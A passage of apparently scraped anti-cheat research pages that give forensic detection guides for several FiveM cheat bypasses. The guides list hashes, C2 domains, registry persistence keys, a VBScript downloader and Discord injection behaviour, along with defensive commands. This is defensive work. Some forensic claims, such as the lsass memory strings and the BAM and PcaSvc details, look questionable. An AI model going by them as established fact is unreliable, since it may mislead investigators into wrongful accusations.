hash verification\ * Plaso super timeline + Timesketch collaboration\ * Chain-of-custody documentation + peer review\ \ Open Tier 4](https://clubhouseac.shop/research/pc-checking-methods/tier-4) [Tier 5\ \ Where bypasses die\ \ Contradiction forensics\ -----------------------\ \ Detection of file overwrite bypasses, byte-level replacement, ghost artifacts, and cross-source disagreement. Where one bypass leaves evidence that another bypass missed — the science of finding what doesn't agree.\ \ * AmCache hash vs on-disk hash mismatch\ * Prefetch wipe contradiction with surviving artifacts\ * Same-name/same-size replacement proof\ \ Open Tier 5](https://clubhouseac.shop/research/pc-checking-methods/tier-5) How to use these tiers Always start at Tier 1. Escalate only when findings warrant it: a Tier 1 auto-fail ends the check immediately; ambiguous results escalate to Tier 2; suspicion of fileless / memory-only / kernel cheats escalates to Tier 3; appeals or ban-evasion suspects with prior strikes go to Tier 4; specific bypass-technique suspicion goes to Tier 5. Document every step before issuing a verdict. --- # Wexize Bypass: BAM Registry & Prefetch Execution Trail | Clubhouse AC Research · Clubhouse AC Bypass Detection·Jun 2, 2026 Wexize Bypass: BAM Registry & Prefetch Execution Trail ====================================================== Wexize Revamp.exe claims anti-forensic properties, but Windows execution telemetry tells a different story. BAM registry timestamps, a PcaSVC entry at offset 0xac424d0, Prefetch records readable via WinPrefetchView, and LastActivityView all independently preserve the execution event — none of which the bypass clears on exit. FiveMBypass DetectionBAM RegistryPrefetchIOC Defensive use only. Detection methodologies published for server administrators, DFIR practitioners, and anti-cheat researchers. No evasion guidance is provided. Overview -------- Wexize Revamp is a FiveM anti-cheat bypass that markets itself with claims of clean execution — implying it leaves no forensic footprint. In practice, Windows' own execution telemetry subsystems record the binary's launch and preserve that record in multiple independent locations that the bypass does not and, in most cases, cannot clear without triggering its own detection. The Background Activity Monitor (BAM), a Windows kernel-mode driver that tracks application execution for battery and performance management, writes a timestamped registry entry for every executed binary under the current user's SID. The Wexize loader binary — Wexize Revamp.exe — appears in this hive with its full execution path and a FILETIME timestamp. Disabling or tampering with the BAM service to erase this entry would itself be a detectable anomaly. Supplementary artifacts include a PcaSVC (Program Compatibility Assistant Service) log entry at offset 0xac424d0, a Windows Prefetch file for the binary name, and a LastActivityView event log record. Together these form a quadruple-corroborated execution trail that establishes both the presence of the binary and the precise time it was run. Primary IOCs ------------ 1 ### SHA-1 hash identification The known SHA-1 hash for Wexize Revamp.exe is 404209b5e427ddb7ab14c6bd77044d13922f1db4. If the binary is still present on disk, compute the hash with certutil -hashfile "Wexize Revamp.exe" SHA1. A match confirms this specific build. Submit to VirusTotal to check for any additional vendor detections. If the file has been deleted, the hash can sometimes be recovered from Prefetch metadata or from the PcaSVC log entry, both of which embed path information that can be correlated with NTFS journal creation records. 2 ### BAM registry entry — execution timestamp Open Registry Editor or RegistryExplorer and navigate to HKLM\\SYSTEM\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\. Expand the subkey matching the current user's SID. Each binary value name is a full executable path; the value data is an 8-byte FILETIME representing the last execution time. Search for any value name containing Wexize or the path from which it was launched. Parse the FILETIME binary value using RegistryExplorer's built-in converter or a hex-to-FILETIME utility. The decoded timestamp is the precise moment Windows last recorded the binary running. This timestamp cannot be altered by user-space tools without modifying a protected registry hive while the BAM driver is loaded. 3 ### PcaSVC entry at offset 0xac424d0 The Program Compatibility Assistant Service maintains a database of program execution events for compatibility telemetry. Open the PcaSVC log file (located under %SystemRoot%\\AppCompat\\Programs\\ or accessible via the Windows Event Log under Application and Services Logs) and search for a record referencing Wexize Revamp.exe. The entry at offset 0xac424d0 contains the binary path, execution time, and compatibility flags recorded by Windows at runtime. This artifact is independent of the BAM registry hive and is written by a different Windows subsystem, making it a reliable corroborating record even if one artifact is individually contested. 4 ### WinPrefetchView — Prefetch file record Windows Prefetch files are stored at C:\\Windows\\Prefetch\\ and contain execution metadata for launched executables. Open WinPrefetchView and look for an entry matching WEXIZE REVAMP.EXE or a similar normalized version of the filename. The Prefetch record includes the run count, last run time, and the list of files and directories accessed during the first few seconds of execution. The Prefetch file itself is created or updated on every execution and persists on disk until the Prefetch cache is manually cleared or the system recycles old entries. Its presence confirms the binary ran on this machine regardless of whether the executable file has since been deleted. 5 ### LastActivityView — execution timeline Open NirSoft's LastActivityView utility, which aggregates execution evidence from multiple sources including Prefetch, BAM, and event logs into a unified timeline. Search for Wexize in the description or filename column. The matching entry will display the execution time, action type, and data source that recorded it, allowing quick cross-reference against the BAM timestamp. When the BAM timestamp and the LastActivityView record agree to within seconds, the execution event is corroborated by at least two independent telemetry systems — a strong evidentiary standard for enforcement action. BAM Registry Analysis --------------------- The Background Activity Monitor is a Windows kernel driver (part of the Power Management infrastructure) that records execution events to enable intelligent resource scheduling. It writes entries to HKLM\\SYSTEM\\CurrentControlSet\\Services\\bam\\State\\UserSettings as a side effect of its primary scheduling function — not as a forensic or audit tool. This means cheat developers cannot simply "clear" the entries with a standard registry delete without stopping or disabling the BAM service itself. Stopping the BAM service (a protected system driver) requires administrator privileges and leaves its own artifact: the service's start type, last state transition, and any related Event Log entries at ID 7036 (Service Control Manager). A subject whose BAM service is stopped or whose BAM registry subkey is suspiciously empty should themselves be treated as indicative of anti-forensic tampering. BAM entries are keyed per user SID, meaning that entries for other user accounts on the same machine are stored in separate subkeys. If a bypass was run under a different user account, check all SID subkeys present — not only the one for the current logged-in user. Screenshare Check Methodology ----------------------------- 1 ### BAM registry inspection via regedit Ask the subject to open regedit as administrator and navigate to HKLM\\SYSTEM\\CurrentControlSet\\Services\\bam\\State\\UserSettings. Have them expand their user SID subkey and scroll through the binary values on screen. Look for any path value containing Wexize or unusual executables in Downloads or user-writable directories. Ask them not to close any dialogs while you review. 2 ### WinPrefetchView scan Open WinPrefetchView (portable, no install required) and sort by Last Run time descending. Share the full window on screen. Search for Wexize using the Find function. If a Prefetch record is present, it will display the full path and execution count. Export the results to a text file for documentation. 3 ### LastActivityView execution timeline Run LastActivityView and wait for it to finish aggregating sources. Sort by Action Time descending. Use Find to search for Wexize. Any result confirms execution recorded by at least one Windows telemetry subsystem. Note the source column — it will identify which artifact type (Prefetch, BAM, Event Log) generated the record. 4 ### PcaSVC log review Open Event Viewer and navigate to Applications and Services Logs. Search for entries from the source PcaSvc within the relevant session timeframe. Alternatively, export the PcaSVC database file from %SystemRoot%\\AppCompat\\Programs\\ and open it with a compatible viewer. Look for the Wexize executable path and the recorded execution time. 5 ### Hash the binary if still present If Wexize Revamp.exe is still present anywhere on disk (Downloads, Desktop, AppData), run certutil -hashfile SHA1 and compare the output against the known hash 404209b5...db4. A match confirms this specific build. Submit to VirusTotal on screen for live detection results. Detection Notes --------------- The primary defense value of the BAM registry artifact is its resistance to user-space tampering. Unlike Prefetch files, which can be deleted with elevated privileges by a knowledgeable user, the BAM hive entries require disabling a kernel driver and restarting the system to clear — an action that is itself a detectable and suspicious event in the Event Log. When all four artifact types — BAM registry, PcaSVC, Prefetch, and LastActivityView — agree on the same executable path and a consistent timestamp window, the evidentiary chain is effectively unbreakable through software means alone. Wexize's anti-forensic marketing claims do not address any of these telemetry layers. Investigators should document the PcaSVC offset 0xac424d0 as a version-specific fingerprint. If future Wexize builds alter the binary, the offset will change — but the BAM and Prefetch indicators will continue to apply to any executable with the Wexize name or file path pattern. --- # Purge Bypass: Emoji-Named DLL, Discord Bot C2 & VBScript Downloader | Clubhouse AC Research · Clubhouse AC Bypass Detection·Jun 2, 2026 Purge Bypass: Emoji-Named DLL, Discord Bot C2 & VBScript Downloader =================================================================== The Purge bypass drops a DLL named c👎.dll — an emoji character in the filename evades simple string-based file searches — persists via HKCU\\Printers\\DevModePerUser, injects a second stage through the local Discord client, and fetches additional payloads via an obfuscated VBScript downloader. FiveMBypass DetectionEmoji DLLRegistry PersistenceVBScript Downloader Defensive use only. Detection methodologies published for server administrators, DFIR practitioners, and anti-cheat researchers. No evasion guidance is provided. Overview -------- The Purge bypass is a multi-stage FiveM anti-cheat bypass with an unusually creative set of evasion mechanisms. Its most immediately distinctive artifact is the dropped DLL named c👎.dll, where a thumbs-down emoji character (Unicode U+1F44E) is embedded directly in the filename. Most file-searching tools and log parsers that operate on ASCII or basic UTF-8 filenames will not match this file under simple string searches, making it invisible to investigators who search for .dll drops without Unicode-aware enumeration. The bypass also spawns cmd.exe, which opens System Informer — an unusual behaviour that suggests the bypass is performing its own process monitoring check to detect security tools. This process spawn pattern is itself a detection indicator observable in process creation logs (Sysmon EventID 1 or Security EventID 4688). Persistence is written to HKCU\\Printers\\DevModePerUser, an unconventional registry location used to blend into legitimate printer configuration data. The bypass also drops imgui\_log.txt, a debug log produced by the Dear ImGui UI framework — confirming the bypass has a rendered cheat menu interface built on ImGui. Second-stage injection is performed through the local Discord client, which acts as an injection vector via a localhost bot interface. An obfuscated VBScript downloader fetches additional components from a scrapingant domain — an atypical C2 choice that leverages a legitimate web scraping API service to proxy payload delivery, complicating domain blocklist-based detection. Primary IOCs ------------ 1 ### c👎.dll on disk — emoji filename search Open a PowerShell window as administrator and run: Get-ChildItem -Path C:\\ -Recurse -Filter "\*👎\*" -ErrorAction SilentlyContinue. The emoji character must be typed or pasted correctly — a plain text search for "c.dll" will not match. Alternatively, use Everything (voidtools) which supports Unicode filename search natively. Search for 👎 in the Everything search bar to surface all files containing the thumbs-down emoji. Any .dll file containing an emoji in its name is anomalous by definition — no legitimate software ships DLLs with emoji filenames. 2 ### Registry persistence — HKCU\\\\Printers\\\\DevModePerUser Open Registry Editor (regedit.exe) and navigate to HKEY\_CURRENT\_USER\\Printers\\DevModePerUser. Inspect all values present under this key. Legitimate entries here are binary blobs representing printer device mode configurations and will be associated with known printer names. Any value that contains an executable path, a DLL path, or base64-encoded data is a persistence entry placed by Purge. Also check HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run for a secondary persistence entry if the main key has been cleaned, as some Purge variants use both locations. 3 ### imgui\_log.txt — ImGui cheat UI confirmation Search the filesystem for imgui\_log.txt using Everything or Get-ChildItem -Path C:\\ -Recurse -Filter "imgui\_log.txt". The Dear ImGui framework writes this log file by default when a debug build is active. Its presence confirms that a process running an ImGui-based rendered overlay (i.e., a cheat menu) has executed on the machine. The file typically appears in the directory of the process that rendered the UI, providing path context for where the bypass was executed from. 4 ### Hash identification and VirusTotal Hash the primary Purge executable with certutil -hashfile SHA256 and verify against SHA-256 1c6f0c6aa01e65b9bf17ea1d4d7de0a6382b97dad27541eccc608e5e645d40fa and SHA-1 5f100ced1736b235c1f86aa58f86466cc9818c2d. Submit to VirusTotal for detection names and behaviour report, which will document the VBScript downloader and registry persistence operations in the sandbox run. [VT Report ↗](https://www.virustotal.com/gui/file/1c6f0c6aa01e65b9bf17ea1d4d7de0a6382b97dad27541eccc608e5e645d40fa/details) 5 ### cmd.exe spawning System Informer — process creation log If Sysmon is installed, query EventID 1 (process creation) for SystemInformer.exe as the child process with cmd.exe as the parent. In Event Viewer, filter the Microsoft-Windows-Sysmon/Operational log for EventID 1 and search the XML data for SystemInformer. Without Sysmon, check the Security log for EventID 4688 (process creation) if audit process creation is enabled. This process spawn chain is abnormal and confirms the bypass was performing its own process monitoring sweep. 6 ### VBScript downloader artifacts Search for recently created or modified .vbs files in user-writable directories: Get-ChildItem -Path $env:TEMP,$env:APPDATA -Filter "\*.vbs" -Recurse. Purge drops an obfuscated VBScript that uses WScript.Shell or XMLHTTP to fetch a secondary payload. The script will be heavily obfuscated — look for characteristic VBScript obfuscation patterns such as concatenated character code arrays (e.g., Chr(80)&Chr(79)&...). Any VBScript in a temp directory that performs HTTP requests is a strong indicator. 7 ### scrapingant C2 in DNS cache Run ipconfig /displaydns | findstr /i "scrapingant"in an elevated Command Prompt. Scrapingant is a web scraping API service with no legitimate use case on a gaming PC. Its presence in the DNS cache indicates the VBScript downloader successfully contacted the C2 relay and fetched a secondary component. Note the full hostname for threat intelligence reporting. Persistence & Injection Chain ----------------------------- The Purge bypass establishes persistence through the HKCU\\Printers\\DevModePerUser registry key. This location is chosen specifically because security tools and manual investigators rarely inspect printer configuration subkeys for executable content. The key exists on all Windows machines with printers configured, making its presence non-suspicious at a glance. The malicious value must be read and decoded (typically base64) to reveal the actual payload path or shellcode. The second-stage injection chain uses the locally running Discord client as a vector. The bypass communicates with the Discord client's local RPC socket (listening on localhost on a port in the range 6463–6472) and leverages Discord's built-in Node.js runtime or its update mechanism to execute injected code within the Discord process space. This allows the second stage to run inside a signed, trusted application process, bypassing process-level integrity checks that might flag an unsigned binary. The VBScript downloader represents the third layer of the chain: after the primary executable and the Discord injection, the script fetches and executes an additional payload from the scrapingant relay. This three-stage architecture means that removing only the primary executable does not fully remediate the compromise — all three layers must be confirmed cleared. Screenshare Check Methodology ----------------------------- 1 ### Emoji DLL file search Open Everything and type the thumbs-down emoji into the search bar. Watch the results for any file containing the emoji character — particularly any .dll file. If Everything is not installed, use PowerShell: Get-ChildItem C:\\ -Recurse -Filter "\*👎\*" 2>$null. This check should be done first as the filename is the most distinctive IOC. 2 ### Registry persistence key inspection Open regedit and navigate directly to HKCU\\Printers\\DevModePerUser. Scroll through all values. Legitimate values will have printer-model names as value names and binary data that looks like device configuration structures. Any value with a base64 string, a file path, or a name that does not match an installed printer is the persistence entry. 3 ### imgui\_log.txt filesystem search In an elevated Command Prompt: dir /s /b C:\\imgui\_log.txt 2>nul. Any result means an ImGui-based application ran from that directory. Note the path carefully — it identifies the working directory of the cheat process at runtime. 4 ### VBScript file check in temp directories Open %TEMP% and %APPDATA% in Windows Explorer and sort by date modified. Look for any .vbs file created recently. Open a suspicious VBScript file in Notepad — heavy obfuscation (concatenated Chr() calls or long variable name strings) is a clear indicator of a malicious downloader script. 5 ### DNS cache scrapingant check and hash verification Run ipconfig /displaydns | findstr /i scrapingant. Then locate the primary executable, hash it, and submit to VirusTotal for confirmation. Together these two checks confirm both the download C2 activity and the identity of the primary binary, providing a complete evidence chain. 6 ### cmd.exe / System Informer process audit Check the process creation history via Event Viewer → Windows Logs → Security, filtering for EventID 4688. Search the results for SystemInformer.exe with cmd.exe as the creator process. This confirms the bypass spawned a monitoring tool process, which is the Purge bypass's distinctive behavioural signature. Detection Notes --------------- The emoji DLL filename is one of the most immediately confirmatory artifacts in the bypass detection space. No legitimate software produces DLL files with emoji characters in their names. A single positive result from the emoji filename search is sufficient to conclude that this bypass (or a variant sharing the same naming convention) is or was present on the system. The imgui\_log.txt file survives reboots and binary deletion. Its presence is a persistent record that an ImGui-based cheat menu ran in that directory. Combined with the registry persistence key, these two artifacts can confirm Purge use even after the operator has attempted to clean the machine. The scrapingant C2 relay is an unusual pivot from the keyauth.win and eauth.us.to infrastructure seen in other FiveM bypasses. Its use may indicate the bypass operator is experimenting with legitimate service abuse to avoid domain reputation blocking. Investigators should note the full scrapingant URL from the DNS record for threat intelligence correlation across cases. --- # Old Club44 Bypass: SteamSetup Masquerade with 'Clean Traces' Button | Clubhouse AC Research · Clubhouse AC Bypass Detection·Jun 2, 2026 Old Club44 Bypass: SteamSetup Masquerade with “Clean Traces” Button =================================================================== The Club44 bypass distributes as SteamSetup.exe or WinRARSetup.exe and includes a built-in “Clean Traces” button in its loader UI — a developer-level acknowledgment that forensic traces exist and must be deliberately deleted. This feature is itself an IOC. The bypass authenticates through eauth.us.to with only 16/70 VirusTotal detections, making hash identification critical. FiveMBypass DetectionSteam MasqueradeAnti-Forensic FeatureIOC Defensive use only. Detection methodologies published for server administrators, DFIR practitioners, and anti-cheat researchers. No evasion guidance is provided. Overview -------- Club44 is an older FiveM anti-cheat bypass whose most distinctive characteristic is not its technical injection method but a feature visible in its own user interface: a button explicitly labelled “Clean Traces.” The presence of this button in the bypass loader confirms that its developer was fully aware that running the bypass creates forensic artifacts, and deliberately built an automated cleanup routine into the product to assist users in evading detection during screenshare checks. The bypass masquerades as two highly recognisable installer names: SteamSetup.exe and WinRARSetup.exe. Both are plausible on any gaming PC — Steam is ubiquitous in the FiveM player base, and WinRAR is among the most-downloaded utilities worldwide. These names reduce suspicion in browser download history, prefetch entries, and BAM registry records during casual review. With only 16 out of 70 VirusTotal engine detections, Club44 has a lower AV detection rate than many contemporary bypasses. This makes hash-based identification via the known SHA-256 f1d96aca4ddb6b317e43e2cc599ce69f32a2c41a1c1adf94312da48269536fc2 especially important, as heuristic AV coverage alone cannot be relied upon to flag this sample. Authentication is performed through eauth.us.to, the same infrastructure observed in the Spotless bypass, suggesting shared developer infrastructure or a common authentication service provider in the FiveM bypass market. Primary IOCs ------------ 1 ### Hash identification — SHA-256 and VirusTotal 16/70 Hash any suspicious file named SteamSetup.exe or WinRARSetup.exe that is not located in an official Steam or WinRAR installation path. Run certutil -hashfile SHA256 and compare against f1d96aca4ddb6b317e43e2cc599ce69f32a2c41a1c1adf94312da48269536fc2. Submit to VirusTotal — the 16/70 detection spread will be visible, and the behaviour sandbox report will show the eauth.us.to network connection and any file system operations performed. 2 ### SteamSetup.exe / WinRARSetup.exe filename anomaly The genuine Steam installer is named SteamSetup.exe and is downloaded from store.steampowered.com. Any copy of this filename outside of a browser download folder (e.g., on the Desktop, in AppData, or in a gaming cheat directory) should be treated as suspicious. Check its digital signature: the real Steam installer is signed by Valve Corporation. The Club44 masquerade will be unsigned or carry a generic or missing signature. Right-click the file → Properties → Digital Signatures to verify. Likewise, the authentic WinRAR installer is signed by win.rar GmbH. Any unsigned copy of WinRARSetup.exe is anomalous. 3 ### eauth.us.to C2 in DNS cache and lsass memory Run ipconfig /displaydns | findstr /i "eauth"in an elevated Command Prompt. Then open System Informer as administrator, locate lsass.exe, open its Memory tab, and search for the string eauth. The Club44 authentication module contacts eauth.us.to during its license check, producing both a DNS cache entry and a memory string artifact in lsass. Either indicator alone is sufficient to confirm that a bypass using eauth.us.to infrastructure was active in the current session. Note: the Spotless bypass also uses eauth.us.to. When this domain is observed, both Club44 and Spotless should be considered in the analysis. Hash confirmation distinguishes between them. 4 ### Loader UI 'Clean Traces' button identification If the bypass loader is still running during the screenshare, its UI will be visible and will contain a “Clean Traces” button. The presence of this button in the running application is an unambiguous IOC — document it with a screenshot immediately. Even if the user has already clicked the button before the screenshare, the button's existence in the binary's resources can be confirmed by opening the executable in Resource Hacker or DIE and inspecting the dialog resources. If the loader is not currently running but the binary is on disk, the dialog resource containing the “Clean Traces” string will be present in the PE resource section and is extractable without executing the binary. 5 ### Journal Trace entries — installation and cleanup artifacts Run fsutil usn readjournal C: csv > journal.csvand filter for entries matching SteamSetup, WinRARSetup, and any other file operations timestamped around the suspected bypass use window. If the user pressed the “Clean Traces” button, the journal may contain deletion records for files the bypass attempted to remove — the act of deletion is itself recorded in the journal, creating an ironic confirmation artifact: the cleanup left a record of its own operation. The 'Clean Traces' Problem -------------------------- The “Clean Traces” button in the Club44 loader UI represents an important forensic principle: the act of attempting to remove evidence is itself evidence. A user who clicks this button before a screenshare has confirmed two things: first, that they knowingly ran a bypass that they understood would leave forensic artifacts; and second, that they were aware of and used the cleanup functionality, demonstrating intent to conceal. The cleanup routine that the button executes is not comprehensive. It cannot clear all artifact layers simultaneously. In practice, investigators consistently find residual indicators even after the button has been pressed: * The eauth.us.to string in lsass.exe memory persists until reboot — the cleanup routine does not and cannot clear another process's allocated memory pages without privileged memory overwrite operations that would themselves leave traces. * The NTFS USN change journal records every file deletion the cleanup performs, creating deletion records for each artifact removed. These journal entries document the cleanup operation and its timestamp. * The BAM registry key entry for the bypass executable persists until the BAM state is manually cleared — the cleanup routine typically does not touch the BAM hive because doing so requires writing to a system-owned registry location. * If prefetch is enabled, the prefetch file for the bypass executable will be updated (not deleted) by the most recent run, preserving execution history. In summary: a user who presses “Clean Traces” has not erased the evidence — they have rearranged it. The investigation methodology must account for the post-cleanup artifact state, which differs from a never-cleaned machine but still contains confirming indicators across multiple independent channels. Screenshare Check Methodology ----------------------------- 1 ### SteamSetup / WinRARSetup filename and signature check Open Everything and search for SteamSetup.exe and WinRARSetup.exe. For any result outside of official install paths (C:\\Program Files (x86)\\Steam\\ for the former), right-click → Properties → Digital Signatures. The real Steam installer is signed by Valve Corporation. No signature, or a signature from an unknown entity, confirms this is the bypass masquerade. 2 ### Hash verification and VirusTotal submission If the file is accessible: certutil -hashfile SHA256. Match against f1d96aca4ddb6b317e43e2cc599ce69f32a2c41a1c1adf94312da48269536fc2. Submit to VirusTotal and show the detection results on screen. Even the 16/70 detections will include labels from anti-cheat vendors that specifically name Club44 or the eauth.us.to auth family. 3 ### eauth.us.to DNS cache and lsass memory scan Run ipconfig /displaydns | findstr /i eauth. Then open System Informer → lsass.exe → Memory → Find Strings → eauth. A hit in lsass memory means the bypass authenticated in the current Windows session — this cannot be explained away as a cached result from a prior session because lsass memory is cleared on every system restart. 4 ### BAM registry review for installer-named executable Open regedit and navigate to HKLM\\SYSTEM\\CurrentControlSet\\Services\\bam\\State\\UserSettings. Look for binary values containing path strings with SteamSetup or WinRARSetupin a user-writable location (Downloads, Desktop, AppData). The timestamp encoded in the binary value is the last execution time. An entry outside of C:\\Program Files for either filename confirms execution of the masquerade binary. 5 ### USN journal and Journal Trace cleanup artifact review Run fsutil usn queryjournal C: and note the First USN value. Then export the journal: fsutil usn readjournal C: csv > journal.csv. Filter for the SteamSetup / WinRARSetup filenames and for any deletion records timestamped in the suspected activity window. If the “Clean Traces” button was pressed, those deletion events will be present in the journal as confirming evidence of the cleanup attempt. Detection Notes --------------- Club44's low VirusTotal detection count (16/70) means that relying on AV scanning alone will produce false negatives in the majority of engine coverage. Hash-based identification must be the primary confirmation method for static analysis. The known SHA-256 should be cross-checked against VirusTotal at the start of every Club44-suspected investigation. The shared eauth.us.to infrastructure with Spotless means that when eauth.us.to is confirmed in DNS cache or lsass memory, both bypass families should be considered. The digital signature check on the masquerade executable (unsigned vs. Valve-signed) and the hash check provide the disambiguation. The “Clean Traces” button is the most conceptually important IOC in this bypass family. Legitimate software — including legitimate installers for Steam and WinRAR — does not include forensic cleanup functionality. Its mere existence in the binary, visible in dialog resources without execution, proves deliberate anti-forensic design intent and is conclusive evidence that the software was purpose-built to evade post-hoc detection. --- # Superior Bypass: 7-Zip Masquerade with keyauth.win C2 | Clubhouse AC Research · Clubhouse AC Bypass Detection·Jun 2, 2026 Superior Bypass: 7-Zip Masquerade with keyauth.win C2 ===================================================== The Superior Bypass plants its executable inside the legitimate 7-Zip installation directory as 7zCon.exe, impersonating the real 7-Zip console tool. Static analysis with Detect-It-Easy extracts embedded strings — Clear, Clean, Cheat, and Cheat Engine — confirming its purpose. C2 authentication flows through keyauth.win. FiveMBypass Detection7-Zip Masqueradekeyauth.winIOC Defensive use only. Detection methodologies published for server administrators, DFIR practitioners, and anti-cheat researchers. No evasion guidance is provided. Overview -------- The Superior Bypass leverages the trusted reputation of 7-Zip — one of the most commonly installed utilities on Windows — to hide in plain sight. The bypass executable is placed at C:\\Program Files\\7-zip\\7zCon.exe, reusing the filename of the legitimate 7-Zip console binary. On a system with 7-Zip already installed, this file competes visually with the genuine 7zCon.exe for attention, and a cursory directory listing reveals no obvious anomaly. The impersonation breaks down quickly under static analysis. Running the file through Detect-It-Easy (DIE) and extracting its embedded string table surfaces four keywords that have no business appearing in a compression utility: Clear, Clean, Cheat, and Cheat Engine. These strings reflect the bypass's internal feature set: clearing anti-cheat telemetry, cleaning execution traces, and referencing Cheat Engine for process manipulation. They are definitive proof of intent. At runtime, the bypass contacts keyauth.win to perform licensing validation before activating. This authentication handshake leaves residue in the system DNS cache and in the memory of lsass.exe, providing two independent and reliable indicators even after the bypass process is no longer running. A legitimate 7-Zip installation has no network connectivity requirements whatsoever — the presence of any outbound connection from this path is inherently suspicious. Primary IOCs ------------ 1 ### File path anomaly — 7zCon.exe in 7-Zip directory Navigate to C:\\Program Files\\7-zip\\ and inspect the directory contents. If a legitimate copy of 7-Zip is installed, a genuine 7zCon.exe will be present — but its hash will not match the bypass. Run certutil -hashfile "C:\\Program Files\\7-zip\\7zCon.exe" SHA256 and compare the result against the known legitimate 7-Zip release for the installed version. Any mismatch warrants full investigation. Also inspect the file creation and modification timestamps. The genuine 7zCon.exe timestamp will match the 7-Zip installer date. A recently created or modified file that does not align with the known installation date is a strong secondary indicator. 2 ### SHA-256 hash verification The known malicious hash for the Superior Bypass 7zCon.exe is: 3ab3d87217c6b22f986e43a79e058b202e609f2571c370ba9668ee89ae638b4e. Compute the hash with certutil -hashfile SHA256 and compare directly. A match confirms the Superior Bypass binary. Submit the hash to VirusTotal to check for additional detection coverage and attribution. Because bypass developers frequently repack their executables to avoid static hash detection, a non-matching hash does not clear the file — proceed with the DIE string analysis step regardless. 3 ### DIE string analysis — Clear, Clean, Cheat, Cheat Engine Open the suspicious 7zCon.exe in Detect-It-Easy. Navigate to the string extraction view and search for the keywords Cheat, Cheat Engine, Clear, and Clean. The legitimate 7-Zip console executable contains none of these terms. Their presence is unambiguous evidence that the file is not a compression utility. DIE also identifies the compiler and packer used. Note the detected binary type — if it shows a .NET runtime or a custom packer not used by the 7-Zip project, that further differentiates the bypass from the genuine tool. Cross-reference with the official 7-Zip release to confirm divergence. 4 ### keyauth.win in DNS cache From an elevated Command Prompt run ipconfig /displaydns and scan the output for any record resolving under the keyauth.win domain. The DNS cache retains entries until TTL expiry or a reboot — a recent bypass activation will leave this entry even if the process has since been closed. Filter the output with ipconfig /displaydns | findstr /i keyauth for quick review. 5 ### keyauth.win string in lsass.exe memory Open System Informer with administrator privileges. Locate the lsass.exe process in the process tree, open its Properties, and navigate to the Memory tab. Use the Find Strings function to search for keyauth. The authentication module writes the domain name into lsass memory during its credential or token exchange flow, and this string persists in memory pages until they are overwritten or the system is rebooted. A keyauth.win string hit inside lsass — a process that has no reason to reference external authentication services — is individually sufficient to confirm that a keyauth-gated bypass was active during the current system session. Screenshare Check Methodology ----------------------------- 1 ### Hash the 7zCon.exe in the 7-Zip directory Ask the subject to open an elevated Command Prompt and run certutil -hashfile "C:\\Program Files\\7-zip\\7zCon.exe" SHA256. Read the output hash aloud or share it on screen. Compare against the known legitimate hash for their installed 7-Zip version. A mismatch or a match to the known bypass hash 3ab3d872...b4e is a positive indicator. 2 ### DNS cache keyauth.win check Have the subject run ipconfig /displaydns | findstr /i keyauth in the same elevated Command Prompt window. Any output line confirms a recent DNS resolution event for keyauth.win. If they have recently rebooted, also check the lsass memory path in the following step. 3 ### System Informer lsass memory string scan Open System Informer as administrator. Locate lsass.exe, right-click → Properties → Memory. Click Find Strings and enter keyauth as the search term. Walk through any results on screen. A result here, combined with the DNS cache check, provides a two-layer confirmation that keyauth.win was contacted during this session. 4 ### DIE static analysis of 7zCon.exe If Detect-It-Easy is available on the system (or can be run from a portable copy), drag the suspicious 7zCon.exe into the DIE window. Navigate to the Strings tab and search for Cheat. Have the subject share the DIE window on screen. A hit on Cheat Engine or any of the bypass-specific keywords is conclusive on its own. 5 ### File timestamp and size review In the same Command Prompt, run dir "C:\\Program Files\\7-zip\\7zCon.exe". Read the creation date and file size on screen. The legitimate 7-Zip 7zCon.exe for a common release is approximately 90–130 KB. A file that is significantly larger or has a creation date that does not match the rest of the 7-Zip installation directory is further corroborating evidence of the masquerade. Detection Notes --------------- The 7-Zip directory masquerade is effective against non-technical reviewers because 7-Zip is an extremely common utility and its installation directory is not typically scrutinized. The key differentiator is that the legitimate 7-Zip binary suite has no network activity — any network connection originating from a process in C:\\Program Files\\7-zip\\ is anomalous by definition. DIE string extraction is the fastest path to confirmation in a forensic context because it does not require the binary to be executed. The embedded strings Cheat and Cheat Engine cannot appear in a legitimate compression tool under any circumstance. This makes static analysis the most reliable detection vector that cannot be defeated by runtime evasion techniques such as process hollowing or DLL injection. The SHA-256 hash 3ab3d87217c6b22f986e43a79e058b202e609f2571c370ba9668ee89ae638b4e should be treated as a point-in-time indicator. Bypass developers regularly repack or recompile to rotate hashes. Always combine hash matching with behavioral indicators — the keyauth.win DNS/lsass artifacts and the DIE string content — for robust detection that survives repacking. --- # Star.xyz Bypass: Win32 EXE with keyauth.win LSASS Strings | Clubhouse AC Research · Clubhouse AC Bypass Detection·Jun 2, 2026 Star.xyz Bypass: Win32 EXE with keyauth.win LSASS Strings ========================================================= The Star.xyz bypass is a 4.54 MB Win32 executable identified by SHA-256 ce5f6779...47b4 that authenticates through keyauth.win, leaving the domain string simultaneously in the DNS cache and in lsass.exe memory. This guide documents all artifact layers from hash identification through runtime memory forensics. FiveMBypass Detectionkeyauth.winLSASSIOC Defensive use only. Detection methodologies published for server administrators, DFIR practitioners, and anti-cheat researchers. No evasion guidance is provided. Overview -------- Star.xyz is a FiveM anti-cheat bypass distributed as a standalone Win32 PE executable with a file size of 4.54 MB. Unlike DLL-based bypasses that require a separate loader, the Star.xyz payload bundles its injection logic and authentication module into a single self-contained binary. This simplifies distribution and reduces the number of discrete on-disk artifacts, though it does not eliminate them. The binary is authoritatively identified by two cryptographic hashes: SHA-256 ce5f6779fdd9c32e5ad6c9dcbc77c3c80a520d1488e9c026f997790cf7ea47b4 and SHA-1 9f926aac866275bb93925a9294e53dbc839e274a. These hashes provide definitive attribution independent of filename, path, or timestamp manipulation. Authentication is handled through the keyauth.win infrastructure, a commercial license key service commonly abused by cheat developers. The bypass performs a keyauth license validation on startup, which produces a distinctive dual-artifact signature: the domain appears in the Windows DNS resolver cache at the OS level, and simultaneously the domain string is written into lsass.exe process memory as part of the authentication token exchange. Both artifacts can be independently confirmed during a screenshare investigation. Primary IOCs ------------ 1 ### Hash identification (SHA-256 and SHA-1) If the executable is still on disk, compute its hashes using certutil -hashfile SHA256 and certutil -hashfile SHA1. Confirm against SHA-256 ce5f6779fdd9c32e5ad6c9dcbc77c3c80a520d1488e9c026f997790cf7ea47b4 and SHA-1 9f926aac866275bb93925a9294e53dbc839e274a. A match is definitive attribution regardless of what the file is named or where it is stored. 2 ### DNS cache — keyauth.win resolution record Run ipconfig /displaydns in an elevated Command Prompt and 